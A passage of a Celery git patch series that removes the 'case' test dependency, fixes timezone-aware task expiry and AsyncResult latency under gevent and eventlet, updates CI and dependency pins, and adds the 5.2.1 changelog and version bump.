+ else:
+ r.__setattr__(key, value)
+ return r
diff --git a/t/unit/contrib/test_migrate.py b/t/unit/contrib/test_migrate.py
index e36e2f32751..2e395057462 100644
--- a/t/unit/contrib/test_migrate.py
+++ b/t/unit/contrib/test_migrate.py
@@ -3,7 +3,6 @@
import pytest
from amqp import ChannelError
-from case import mock
from kombu import Connection, Exchange, Producer, Queue
from kombu.transport.virtual import QoS
from kombu.utils.encoding import ensure_bytes
@@ -14,6 +13,7 @@
migrate_tasks, move, move_by_idmap,
move_by_taskmap, move_task_by_id,
start_filter, task_id_eq, task_id_in)
+from t.unit import conftest
# hack to ignore error at shutdown
QoS.restore_at_shutdown = False
@@ -203,7 +203,7 @@ def test_maybe_queue():
def test_filter_status():
- with mock.stdouts() as (stdout, stderr):
+ with conftest.stdouts() as (stdout, stderr):
filter_status(State(), {'id': '1', 'task': 'add'}, Mock())
assert stdout.getvalue()
diff --git a/t/unit/events/test_snapshot.py b/t/unit/events/test_snapshot.py
index 95b56aca3b5..3dfb01846e9 100644
--- a/t/unit/events/test_snapshot.py
+++ b/t/unit/events/test_snapshot.py
@@ -1,7 +1,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.app.events import Events
from celery.events.snapshot import Polaroid, evcam
@@ -106,8 +105,7 @@ def setup(self):
self.app.events = self.MockEvents()
self.app.events.app = self.app
- @mock.restore_logging()
- def test_evcam(self):
+ def test_evcam(self, restore_logging):
evcam(Polaroid, timer=timer, app=self.app)
evcam(Polaroid, timer=timer, loglevel='CRITICAL', app=self.app)
self.MockReceiver.raise_keyboard_interrupt = True
diff --git a/t/unit/fixups/test_django.py b/t/unit/fixups/test_django.py
index e352b8a7b2f..44938b1a04f 100644
--- a/t/unit/fixups/test_django.py
+++ b/t/unit/fixups/test_django.py
@@ -2,10 +2,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.fixups.django import (DjangoFixup, DjangoWorkerFixup,
FixupWarning, _maybe_close_fd, fixup)
+from t.unit import conftest
class FixupCase:
@@ -54,6 +54,18 @@ def test_autodiscover_tasks(self, patching):
apps.get_app_configs.return_value = configs
assert f.autodiscover_tasks() == [c.name for c in configs]
+ @pytest.mark.masked_modules('django')
+ def test_fixup_no_django(self, patching, mask_modules):
+ with patch('celery.fixups.django.DjangoFixup') as Fixup:
+ patching.setenv('DJANGO_SETTINGS_MODULE', '')
+ fixup(self.app)
+ Fixup.assert_not_called()
+
+ patching.setenv('DJANGO_SETTINGS_MODULE', 'settings')
+ with pytest.warns(FixupWarning):
+ fixup(self.app)
+ Fixup.assert_not_called()
+
def test_fixup(self, patching):
with patch('celery.fixups.django.DjangoFixup') as Fixup:
patching.setenv('DJANGO_SETTINGS_MODULE', '')
@@ -61,11 +73,7 @@ def test_fixup(self, patching):
Fixup.assert_not_called()
patching.setenv('DJANGO_SETTINGS_MODULE', 'settings')
- with mock.mask_modules('django'):
- with pytest.warns(FixupWarning):
- fixup(self.app)
- Fixup.assert_not_called()
- with mock.module_exists('django'):
+ with conftest.module_exists('django'):
import django
django.VERSION = (1, 11, 1)
fixup(self.app)
@@ -257,17 +265,17 @@ def test_on_worker_ready(self):
f._settings.DEBUG = True
f.on_worker_ready()
- def test_validate_models(self, patching):
- with mock.module('django', 'django.db', 'django.core',
- 'django.core.cache', 'django.conf',
- 'django.db.utils'):
- f = self.Fixup(self.app)
- f.django_setup = Mock(name='django.setup')
- patching.modules('django.core.checks')
- from django.core.checks import run_checks
- f.validate_models()
- f.django_setup.assert_called_with()
- run_checks.assert_called_with()
+ @pytest.mark.patched_module('django', 'django.db', 'django.core',
+ 'django.core.cache', 'django.conf',
+ 'django.db.utils')
+ def test_validate_models(self, patching, module):
+ f = self.Fixup(self.app)
+ f.django_setup = Mock(name='django.setup')
+ patching.modules('django.core.checks')
+ from django.core.checks import run_checks
+ f.validate_models()
+ f.django_setup.assert_called_with()
+ run_checks.assert_called_with()
def test_django_setup(self, patching):
patching('celery.fixups.django.symbol_by_name')
diff --git a/t/unit/security/test_certificate.py b/t/unit/security/test_certificate.py
index 910cb624618..d9f525dad25 100644
--- a/t/unit/security/test_certificate.py
+++ b/t/unit/security/test_certificate.py
@@ -3,10 +3,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.exceptions import SecurityError
from celery.security.certificate import Certificate, CertStore, FSCertStore
+from t.unit import conftest
from . import CERT1, CERT2, KEY1
from .case import SecurityCase
@@ -84,7 +84,7 @@ def test_init(self, Certificate, glob, isdir):
cert.has_expired.return_value = False
isdir.return_value = True
glob.return_value = ['foo.cert']
- with mock.open():
+ with conftest.open():
cert.get_id.return_value = 1
path = os.path.join('var', 'certs')
diff --git a/t/unit/security/test_security.py b/t/unit/security/test_security.py
index 31d682e37be..0b75ffc3619 100644
--- a/t/unit/security/test_security.py
+++ b/t/unit/security/test_security.py
@@ -19,13 +19,13 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from kombu.exceptions import SerializerNotInstalled
from kombu.serialization import disable_insecure_serializers, registry
from celery.exceptions import ImproperlyConfigured, SecurityError
from celery.security import disable_untrusted_serializers, setup_security
from celery.security.utils import reraise_errors
+from t.unit import conftest
from . import CERT1, KEY1
from .case import SecurityCase
@@ -120,7 +120,7 @@ def effect(*args):
self.app.conf.task_serializer = 'auth'
self.app.conf.accept_content = ['auth']
- with mock.open(side_effect=effect):
+ with conftest.open(side_effect=effect):
with patch('celery.security.registry') as registry:
store = Mock()
self.app.setup_security(['json'], key, cert, store)
diff --git a/t/unit/tasks/test_tasks.py b/t/unit/tasks/test_tasks.py
index f5b4af87003..d170ccd178f 100644
--- a/t/unit/tasks/test_tasks.py
+++ b/t/unit/tasks/test_tasks.py
@@ -4,12 +4,12 @@
from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
import pytest
-from case import ContextMock
from kombu import Queue
from kombu.exceptions import EncodeError
from celery import Task, group, uuid
from celery.app.task import _reprtask
+from celery.contrib.testing.mocks import ContextMock
from celery.exceptions import Ignore, ImproperlyConfigured, Retry
from celery.result import AsyncResult, EagerResult
from celery.utils.time import parse_iso8601
diff --git a/t/unit/utils/test_platforms.py b/t/unit/utils/test_platforms.py
index 4100ad56560..1c0a03d9893 100644
--- a/t/unit/utils/test_platforms.py
+++ b/t/unit/utils/test_platforms.py
@@ -7,7 +7,6 @@
from unittest.mock import Mock, call, patch
import pytest
-from case import mock
import t.skip
from celery import _find_option_with_arg, platforms
@@ -22,6 +21,7 @@
set_process_title, setgid, setgroups, setuid,
signals)
from celery.utils.text import WhateverIO
+from t.unit import conftest
try:
import resource
@@ -429,7 +429,7 @@ def test_without_resource(self):
@patch('celery.platforms.signals')
@patch('celery.platforms.maybe_drop_privileges')
@patch('os.geteuid')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_default(self, open, geteuid, maybe_drop,
signals, pidlock):
geteuid.return_value = 0
@@ -530,7 +530,7 @@ def test_create_pidlock(self, Pidfile):
p = Pidfile.return_value = Mock()
p.is_locked.return_value = True
p.remove_if_stale.return_value = False
- with mock.stdouts() as (_, err):
+ with conftest.stdouts() as (_, err):
with pytest.raises(SystemExit):
create_pidlock('/var/pid')
assert 'already exists' in err.getvalue()
@@ -567,14 +567,14 @@ def test_is_locked(self, exists):
assert not p.is_locked()
def test_read_pid(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('1816\n')
s.seek(0)
p = Pidfile('/var/pid')
assert p.read_pid() == 1816
def test_read_pid_partially_written(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('1816')
s.seek(0)
p = Pidfile('/var/pid')
@@ -584,20 +584,20 @@ def test_read_pid_partially_written(self):
def test_read_pid_raises_ENOENT(self):
exc = IOError()
exc.errno = errno.ENOENT
- with mock.open(side_effect=exc):
+ with conftest.open(side_effect=exc):
p = Pidfile('/var/pid')
assert p.read_pid() is None
def test_read_pid_raises_IOError(self):
exc = IOError()
exc.errno = errno.EAGAIN
- with mock.open(side_effect=exc):
+ with conftest.open(side_effect=exc):
p = Pidfile('/var/pid')
with pytest.raises(IOError):
p.read_pid()
def test_read_pid_bogus_pidfile(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('eighteensixteen\n')
s.seek(0)
p = Pidfile('/var/pid')
@@ -655,7 +655,7 @@ def test_remove_if_stale_process_alive(self, kill):
@patch('os.kill')
def test_remove_if_stale_process_dead(self, kill):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1816
@@ -668,7 +668,7 @@ def test_remove_if_stale_process_dead(self, kill):
p.remove.assert_called_with()
def test_remove_if_stale_broken_pid(self):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.side_effect = ValueError()
@@ -679,7 +679,7 @@ def test_remove_if_stale_broken_pid(self):
@patch('os.kill')
def test_remove_if_stale_unprivileged_user(self, kill):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1817
@@ -704,7 +704,7 @@ def test_remove_if_stale_no_pidfile(self):
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_write_pid(self, open_, fdopen, osopen, getpid, fsync):
getpid.return_value = 1816
osopen.return_value = 13
@@ -731,7 +731,7 @@ def test_write_pid(self, open_, fdopen, osopen, getpid, fsync):
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_write_reread_fails(self, open_, fdopen,
osopen, getpid, fsync):
getpid.return_value = 1816
diff --git a/t/unit/utils/test_serialization.py b/t/unit/utils/test_serialization.py
index 2f625fdb35f..bf83a0d68b5 100644
--- a/t/unit/utils/test_serialization.py
+++ b/t/unit/utils/test_serialization.py
@@ -6,7 +6,6 @@
import pytest
import pytz
-from case import mock
from kombu import Queue
from celery.utils.serialization import (STRTOBOOL_DEFAULT_TABLE,
@@ -18,14 +17,14 @@
class test_AAPickle:
- def test_no_cpickle(self):
+ @pytest.mark.masked_modules('cPickle')
+ def test_no_cpickle(self, mask_modules):
prev = sys.modules.pop('celery.utils.serialization', None)
try:
- with mock.mask_modules('cPickle'):
- import pickle as orig_pickle
+ import pickle as orig_pickle
- from celery.utils.serialization import pickle
- assert pickle.dumps is orig_pickle.dumps
+ from celery.utils.serialization import pickle
+ assert pickle.dumps is orig_pickle.dumps
finally:
sys.modules['celery.utils.serialization'] = prev
diff --git a/t/unit/utils/test_threads.py b/t/unit/utils/test_threads.py
index 758b39e4265..132f3504bc4 100644
--- a/t/unit/utils/test_threads.py
+++ b/t/unit/utils/test_threads.py
@@ -1,10 +1,10 @@
from unittest.mock import patch
import pytest
-from case import mock
from celery.utils.threads import (Local, LocalManager, _FastLocalStack,
_LocalStack, bgThread)
+from t.unit import conftest
class test_bgThread:
@@ -17,7 +17,7 @@ def body(self):
raise KeyError()
with patch('os._exit') as _exit:
- with mock.stdouts():
+ with conftest.stdouts():
_exit.side_effect = ValueError()
t = T()
with pytest.raises(ValueError):
diff --git a/t/unit/worker/test_autoscale.py b/t/unit/worker/test_autoscale.py
index 7cfea789d4b..f6c63c57ac3 100644
--- a/t/unit/worker/test_autoscale.py
+++ b/t/unit/worker/test_autoscale.py
@@ -2,7 +2,7 @@
from time import monotonic
from unittest.mock import Mock, patch
-from case import mock
+import pytest
from celery.concurrency.base import BasePool
from celery.utils.objects import Bunch
@@ -100,8 +100,8 @@ def join(self, timeout=None):
x.stop()
assert not x.joined
- @mock.sleepdeprived(module=autoscale)
- def test_body(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_body(self, sleepdeprived):
worker = Mock(name='worker')
x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker)
x.body()
@@ -216,8 +216,8 @@ def body(self):
_exit.assert_called_with(1)
stderr.write.assert_called()
- @mock.sleepdeprived(module=autoscale)
- def test_no_negative_scale(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_no_negative_scale(self, sleepdeprived):
total_num_processes = []
worker = Mock(name='worker')
x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker)
diff --git a/t/unit/worker/test_consumer.py b/t/unit/worker/test_consumer.py
index a11098f37fa..0e7ce90818f 100644
--- a/t/unit/worker/test_consumer.py
+++ b/t/unit/worker/test_consumer.py
@@ -5,8 +5,8 @@
import pytest
from billiard.exceptions import RestartFreqExceeded
-from case import ContextMock
+from celery.contrib.testing.mocks import ContextMock
from celery.utils.collections import LimitedSet
from celery.worker.consumer.agent import Agent
from celery.worker.consumer.consumer import (CANCEL_TASKS_BY_DEFAULT, CLOSE,
diff --git a/t/unit/worker/test_worker.py b/t/unit/worker/test_worker.py
index c49af9af078..c6733e97d1c 100644
--- a/t/unit/worker/test_worker.py
+++ b/t/unit/worker/test_worker.py
@@ -11,7 +11,6 @@
import pytest
from amqp import ChannelError
-from case import mock
from kombu import Connection
from kombu.asynchronous import get_event_loop
from kombu.common import QoS, ignore_errors
@@ -804,8 +803,8 @@ def test_with_autoscaler(self):
assert worker.autoscaler
@t.skip.if_win32
- @mock.sleepdeprived(module=autoscale)
- def test_with_autoscaler_file_descriptor_safety(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_with_autoscaler_file_descriptor_safety(self, sleepdeprived):
# Given: a test celery worker instance with auto scaling
worker = self.create_worker(
autoscale=[10, 5], use_eventloop=True,
@@ -853,8 +852,8 @@ def test_with_autoscaler_file_descriptor_safety(self):
worker.pool.terminate()
@t.skip.if_win32
- @mock.sleepdeprived(module=autoscale)
- def test_with_file_descriptor_safety(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_with_file_descriptor_safety(self, sleepdeprived):
# Given: a test celery worker instance
worker = self.create_worker(
autoscale=[10, 5], use_eventloop=True,
From 431f07d77289149b9064fdc36202a536f86f2994 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?G=C3=A1bor=20Boros?=
Date: Fri, 12 Nov 2021 09:38:21 +0100
Subject: [PATCH 131/177] fix: task expiration is timezone aware if needed
(#7065)
* fix: task expiration is timezone aware if needed
In #6957 the changes introduced checking for datetime objects for task
expiration, but the implementation does not consider that the
expiration date can be set with or without a timezone. Therefore the
expiration-seconds calculation for the task can raise a TypeError.
Signed-off-by: Gabor Boros
* chore: add Gabor Boros to contributors list
Signed-off-by: Gabor Boros
---
CONTRIBUTORS.txt | 1 +
celery/app/base.py | 4 ++--
t/unit/tasks/test_tasks.py | 11 +++++++++++
3 files changed, 14 insertions(+), 2 deletions(-)
diff --git a/CONTRIBUTORS.txt b/CONTRIBUTORS.txt
index 5dee5a11685..1c497349f54 100644
--- a/CONTRIBUTORS.txt
+++ b/CONTRIBUTORS.txt
@@ -285,3 +285,4 @@ Garry Lawrence, 2021/06/19
Patrick Zhang, 2017/08/19
Konstantin Kochin, 2021/07/11
kronion, 2021/08/26
+Gabor Boros, 2021/11/09
diff --git a/celery/app/base.py b/celery/app/base.py
index 0b893fddb87..671fc846ac6 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -32,7 +32,7 @@
from celery.utils.imports import gen_task_name, instantiate, symbol_by_name
from celery.utils.log import get_logger
from celery.utils.objects import FallbackContext, mro_lookup
-from celery.utils.time import timezone, to_utc
+from celery.utils.time import maybe_make_aware, timezone, to_utc
# Load all builtin tasks
from . import builtins # noqa
@@ -734,7 +734,7 @@ def send_task(self, name, args=None, kwargs=None, countdown=None,
options, route_name or name, args, kwargs, task_type)
if expires is not None:
if isinstance(expires, datetime):
- expires_s = (expires - self.now()).total_seconds()
+ expires_s = (maybe_make_aware(expires) - self.now()).total_seconds()
else:
expires_s = expires
diff --git a/t/unit/tasks/test_tasks.py b/t/unit/tasks/test_tasks.py
index d170ccd178f..89689914f26 100644
--- a/t/unit/tasks/test_tasks.py
+++ b/t/unit/tasks/test_tasks.py
@@ -941,6 +941,17 @@ def test_regular_task(self):
name='George Costanza', test_eta=True, test_expires=True,
)
+ # With ETA, absolute expires without timezone.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Constanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=(self.now() + timedelta(hours=2)).replace(tzinfo=None),
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Constanza', test_eta=True, test_expires=True,
+ )
+
# With ETA, absolute expires in the past.
presult2 = self.mytask.apply_async(
kwargs={'name': 'George Costanza'},
From fe37cd834109810dc778845378880abdf7d08ff6 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 12 Nov 2021 18:40:17 +0600
Subject: [PATCH 132/177] minor tweaks to github actions (#7078)
* minor tweaks to github actions
* lets try windows latest
* update minimum dependencies for some package
* try pypy-3 in tox
* revert tox pypy changes
* try latest pip
* pin eventlet below python 3.10
* pin python3.10
* pin python3.10
* revert to windows 2019 to check if pypy37 pass
---
.github/workflows/python-package.yml | 25 +++++++------------------
requirements/extras/couchbase.txt | 2 +-
requirements/extras/eventlet.txt | 2 +-
requirements/extras/gevent.txt | 2 +-
requirements/extras/redis.txt | 2 +-
5 files changed, 11 insertions(+), 22 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 6807091169f..54fdc3596dc 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -20,13 +20,13 @@ on:
- '.github/workflows/python-package.yml'
jobs:
- build:
+ Unit:
runs-on: ${{ matrix.os }}
strategy:
fail-fast: false
matrix:
- python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7']
+ python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7','pypy-3.8']
os: ["ubuntu-20.04", "windows-2019"]
steps:
@@ -34,9 +34,9 @@ jobs:
if: startsWith(matrix.os, 'ubuntu-')
run: |
sudo apt update && sudo apt-get install -f libcurl4-openssl-dev libssl-dev gnutls-dev httping expect libmemcached-dev
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v2.4.0
- name: Set up Python ${{ matrix.python-version }}
- uses: actions/setup-python@v2
+ uses: actions/setup-python@v2.2.2
with:
python-version: ${{ matrix.python-version }}
@@ -45,7 +45,7 @@ jobs:
run: |
echo "::set-output name=dir::$(pip cache dir)"
- name: Cache
- uses: actions/cache@v2
+ uses: actions/cache@v2.1.6
with:
path: ${{ steps.pip-cache.outputs.dir }}
key:
@@ -54,7 +54,7 @@ jobs:
${{ matrix.python-version }}-${{matrix.os}}
- name: Install tox
- run: python -m pip install tox tox-gh-actions
+ run: python -m pip install --upgrade pip tox tox-gh-actions
- name: >
Run tox for
"${{ matrix.python-version }}-unit"
@@ -62,20 +62,9 @@ jobs:
run: |
tox --verbose --verbose
- - uses: codecov/codecov-action@v1
+ - uses: codecov/codecov-action@v2.1.0
with:
flags: unittests # optional
fail_ci_if_error: true # optional (default = false)
verbose: true # optional (default = false)
- lint:
- runs-on: ubuntu-latest
- steps:
- - uses: actions/checkout@v2
- - uses: actions/setup-python@v2
- # Must match the Python version in tox.ini for flake8
- with: { python-version: 3.9 }
- - name: Install tox
- run: python -m pip install tox
- - name: Lint with pre-commit
- run: tox --verbose -e lint
diff --git a/requirements/extras/couchbase.txt b/requirements/extras/couchbase.txt
index a86b71297ab..a736d6a7742 100644
--- a/requirements/extras/couchbase.txt
+++ b/requirements/extras/couchbase.txt
@@ -1 +1 @@
-couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
+couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
\ No newline at end of file
diff --git a/requirements/extras/eventlet.txt b/requirements/extras/eventlet.txt
index a25cb65d4f0..047d9cbcbae 100644
--- a/requirements/extras/eventlet.txt
+++ b/requirements/extras/eventlet.txt
@@ -1 +1 @@
-eventlet>=0.26.1; python_version<"3.10"
+eventlet>=0.32.0; python_version<"3.10"
diff --git a/requirements/extras/gevent.txt b/requirements/extras/gevent.txt
index 2fc04b699b3..4d5a00d0fb4 100644
--- a/requirements/extras/gevent.txt
+++ b/requirements/extras/gevent.txt
@@ -1 +1 @@
-gevent>=1.0.0
+gevent>=1.5.0
diff --git a/requirements/extras/redis.txt b/requirements/extras/redis.txt
index b0d3f0fb748..240ddab80bb 100644
--- a/requirements/extras/redis.txt
+++ b/requirements/extras/redis.txt
@@ -1 +1 @@
-redis>=3.2.0
+redis>=3.4.1
From cc5569222db3c1e5bee3a70d679f747940988fec Mon Sep 17 00:00:00 2001
From: mrmaxi
Date: Sun, 14 Nov 2021 15:22:51 +0300
Subject: [PATCH 133/177] fix: reduce latency of AsyncResult.get under gevent
(#7052)
Wake up waiters in `wait_for` after every `drain_events` call instead of only after a 1-second timeout.
Does not block the event loop, because `drain_events` of asynchronous backends with pubsub commonly sleeps for some nonzero time while waiting for events.
---
celery/backends/asynchronous.py | 40 +++++++++++++++++++++-------
t/unit/backends/test_asynchronous.py | 10 +++++--
2 files changed, 39 insertions(+), 11 deletions(-)
diff --git a/celery/backends/asynchronous.py b/celery/backends/asynchronous.py
index 32475d5eaa6..cedae5013a8 100644
--- a/celery/backends/asynchronous.py
+++ b/celery/backends/asynchronous.py
@@ -66,18 +66,30 @@ def wait_for(self, p, wait, timeout=None):
class greenletDrainer(Drainer):
spawn = None
_g = None
+ _drain_complete_event = None # event, sent (and recreated) after every drain_events iteration
+
+ def _create_drain_complete_event(self):
+ """create new self._drain_complete_event object"""
+ pass
+
+ def _send_drain_complete_event(self):
+ """raise self._drain_complete_event for wakeup .wait_for"""
+ pass
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._started = threading.Event()
self._stopped = threading.Event()
self._shutdown = threading.Event()
+ self._create_drain_complete_event()
def run(self):
self._started.set()
while not self._stopped.is_set():
try:
self.result_consumer.drain_events(timeout=1)
+ self._send_drain_complete_event()
+ self._create_drain_complete_event()
except socket.timeout:
pass
self._shutdown.set()
@@ -89,8 +101,14 @@ def start(self):
def stop(self):
self._stopped.set()
+ self._send_drain_complete_event()
self._shutdown.wait(THREAD_TIMEOUT_MAX)
+ def wait_for(self, p, wait, timeout=None):
+ self.start()
+ if not p.ready:
+ self._drain_complete_event.wait(timeout=timeout)
+
@register_drainer('eventlet')
class eventletDrainer(greenletDrainer):
@@ -101,10 +119,12 @@ def spawn(self, func):
sleep(0)
return g
- def wait_for(self, p, wait, timeout=None):
- self.start()
- if not p.ready:
- self._g._exit_event.wait(timeout=timeout)
+ def _create_drain_complete_event(self):
+ from eventlet.event import Event
+ self._drain_complete_event = Event()
+
+ def _send_drain_complete_event(self):
+ self._drain_complete_event.send()
@register_drainer('gevent')
@@ -116,11 +136,13 @@ def spawn(self, func):
gevent.sleep(0)
return g
- def wait_for(self, p, wait, timeout=None):
- import gevent
- self.start()
- if not p.ready:
- gevent.wait([self._g], timeout=timeout)
+ def _create_drain_complete_event(self):
+ from gevent.event import Event
+ self._drain_complete_event = Event()
+
+ def _send_drain_complete_event(self):
+ self._drain_complete_event.set()
+ self._create_drain_complete_event()
class AsyncBackendMixin:
diff --git a/t/unit/backends/test_asynchronous.py b/t/unit/backends/test_asynchronous.py
index c0fe894900a..6593cd53e5e 100644
--- a/t/unit/backends/test_asynchronous.py
+++ b/t/unit/backends/test_asynchronous.py
@@ -158,7 +158,10 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import eventlet
- eventlet.sleep(0)
+ # `drain_events` of asynchronous backends with pubsub have to sleep
+ # while waiting events for not more then `interval` timeout,
+ # but events may coming sooner
+ eventlet.sleep(timeout/10)
def schedule_thread(self, thread):
import eventlet
@@ -204,7 +207,10 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import gevent
- gevent.sleep(0)
+ # `drain_events` of asynchronous backends with pubsub have to sleep
+ # while waiting events for not more then `interval` timeout,
+ # but events may coming sooner
+ gevent.sleep(timeout/10)
def schedule_thread(self, thread):
import gevent
From 59f22712db8879e2fc016c5bed504ae49f0b05c1 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Sun, 14 Nov 2021 13:29:03 +0000
Subject: [PATCH 134/177] [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
---
t/unit/backends/test_asynchronous.py | 2 ++
1 file changed, 2 insertions(+)
diff --git a/t/unit/backends/test_asynchronous.py b/t/unit/backends/test_asynchronous.py
index 6593cd53e5e..479fd855838 100644
--- a/t/unit/backends/test_asynchronous.py
+++ b/t/unit/backends/test_asynchronous.py
@@ -158,6 +158,7 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import eventlet
+
# `drain_events` of asynchronous backends with pubsub have to sleep
# while waiting events for not more then `interval` timeout,
# but events may coming sooner
@@ -207,6 +208,7 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import gevent
+
# `drain_events` of asynchronous backends with pubsub have to sleep
# while waiting events for not more then `interval` timeout,
# but events may coming sooner
From 6b442eb3f2450ede1585e4bae37ee12e6d127947 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 15 Nov 2021 16:41:01 +0000
Subject: [PATCH 135/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/pycqa/isort: 5.10.0 → 5.10.1](https://github.com/pycqa/isort/compare/5.10.0...5.10.1)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 5c7feb69d33..a542597b1c8 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -24,6 +24,6 @@ repos:
- id: mixed-line-ending
- repo: https://github.com/pycqa/isort
- rev: 5.10.0
+ rev: 5.10.1
hooks:
- id: isort
From ddbb67c29dd1137805a2bdf2695cffdbb0d54efa Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 16 Nov 2021 12:10:00 +0600
Subject: [PATCH 136/177] pin redis below v4.0.0 for now to fix kombu
---
requirements/extras/redis.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/extras/redis.txt b/requirements/extras/redis.txt
index 240ddab80bb..6a0c1d208bf 100644
--- a/requirements/extras/redis.txt
+++ b/requirements/extras/redis.txt
@@ -1 +1 @@
-redis>=3.4.1
+redis>=3.4.1,<4.0.0
From 83747fdbe8a751713f702bf765fef31d08229dd9 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 16 Nov 2021 20:27:19 +0600
Subject: [PATCH 137/177] bump minimum kombu version to 5.2.2
---
requirements/default.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index b35e5b393e9..3be20593c97 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,6 +1,6 @@
pytz>0.dev.0
billiard>=3.6.4.0,<4.0
-kombu>=5.2.1,<6.0
+kombu>=5.2.2,<6.0
vine>=5.0.0,<6.0
click>=8.0,<9.0
click-didyoumean>=0.0.3
From 4c92cb745f658382a4eb4b94ba7938d119168165 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 16 Nov 2021 20:52:12 +0600
Subject: [PATCH 138/177] changelog for v5.2.1
---
Changelog.rst | 20 ++++++++++++++++++++
1 file changed, 20 insertions(+)
diff --git a/Changelog.rst b/Changelog.rst
index 8c94896c0aa..84d02ba3ae2 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -8,6 +8,26 @@ This document contains change notes for bugfix & new features
in the & 5.2.x series, please see :ref:`whatsnew-5.2` for
an overview of what's new in Celery 5.2.
+
+.. _version-5.2.1:
+
+5.2.1
+=======
+:release-date: 2021-11-16 8.55 P.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Fix rstrip usage on bytes instance in ProxyLogger.
+- Pass logfile to ExecStop in celery.service example systemd file.
+- fix: reduce latency of AsyncResult.get under gevent (#7052)
+- Limit redis version: <4.0.0.
+- Bump min kombu version to 5.2.2.
+- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
+- Remove dependency to case (#7077).
+- fix: task expiration is timezone aware if needed (#7065).
+- Initial testing of pypy-3.8 beta to CI.
+- Docs, CI & tests cleanups.
+
+
.. _version-5.2.0:
5.2.0
From d32356c0e46eefecd164c55899f532c2fed2df57 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 16 Nov 2021 20:55:01 +0600
Subject: [PATCH 139/177] =?UTF-8?q?Bump=20version:=205.2.0=20=E2=86=92=205?=
=?UTF-8?q?.2.1?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 2 +-
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index c09541dd81c..ad96c6ecbea 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.0
+current_version = 5.2.1
commit = True
tag = True
parse = (?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)(?P<releaselevel>[a-z\d]+)?
diff --git a/README.rst b/README.rst
index 0075875b468..03bbec6f613 100644
--- a/README.rst
+++ b/README.rst
